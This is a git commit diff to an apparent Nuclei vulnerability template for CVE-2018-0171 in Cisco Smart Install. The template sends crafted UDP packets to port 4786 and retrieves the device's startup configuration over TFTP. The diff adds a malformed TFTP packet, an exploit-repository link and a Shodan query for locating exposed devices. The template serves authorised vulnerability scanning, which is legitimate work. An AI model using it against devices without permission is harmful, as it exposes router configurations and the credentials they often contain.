feat: make CVE-2018-0171 stable and add additional info

2026-02-15 23:23:33 +08:00 · 2025-08-25 20:04:09 +02:00
parent bdde1e9f96
commit fc9e4f8501
1 changed files with 19 additions and 6 deletions
--- a/javascript/cves/2018/CVE-2018-0171.yaml
+++ b/javascript/cves/2018/CVE-2018-0171.yaml
@@ -2,13 +2,15 @@ id: CVE-2018-0171

 info:
  name: Cisco Smart Install - Configuration Download
-  author: ritikchaddha
+  author: ritikchaddha, matejsmycka
  severity: critical
  description: |
-    Checks if TFTP service becomes available after Smart Install exploitation. This template should be run after the configuration extraction payload to verify that the device is now serving configuration files via TFTP.
+    A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. 
+    This script sends crafted packets to the Cisco Smart Install port (4786) and dumps the startup configuration via TFTP.
  reference:
    - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2
    - https://nvd.nist.gov/vuln/detail/CVE-2018-0171
+    - https://github.com/AlrikRr/Cisco-Smart-Exploit
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
@@ -19,7 +21,7 @@ info:
    verified: true
    max-request: 2
    shodan-query: 'port:4786 "Smart Install"'
-  tags: cve,cve2018,cisco,smart-install,tftp,network,js,kev
+  tags: cve,cve2018,cisco,smart-install,tftp,network,js,kev,udp

 flow: tcp(1) && javascript(1)

@@ -52,7 +54,14 @@ javascript:
      let c = require("nuclei/net");
      let conn = c.Open('udp', `${Host}:${Port}`);
      conn.SendHex(packet.Hex());
-      let resp = conn.RecvString(4096);
+      let resp = conn.Recv(4096);
+
+      // Send malformed packet otherwise TFTP will not respond for around minute
+      let packet2 = bytes.NewBuffer();
+      let message2 = "\x00\x05error"
+      packet2.WriteString(message2);
+      conn.SendHex(packet2.Hex());
+           
      resp;

    args:
@@ -64,6 +73,10 @@ javascript:
        words:
          - 'boot-start-marker'
          - 'version'
-          - 'hostname'
+          - 'NVRAM'
        condition: and
-# digest: 4a0a004730450220524eb982d0bd03e5e5bd55cda3de7bf60f3b4177dca62eefb68ef0a395ebc8b0022100971bf57fafe0a25b7bf8cba6ff9f7fc6f283c2982a0340bf6f74952119b7d0ee:922c64590222798bb761d5b6d8e72950
+
+    extractors:
+      - type: regex
+        regex:
+          - "version\\s+(\\d+\\.\\d+)"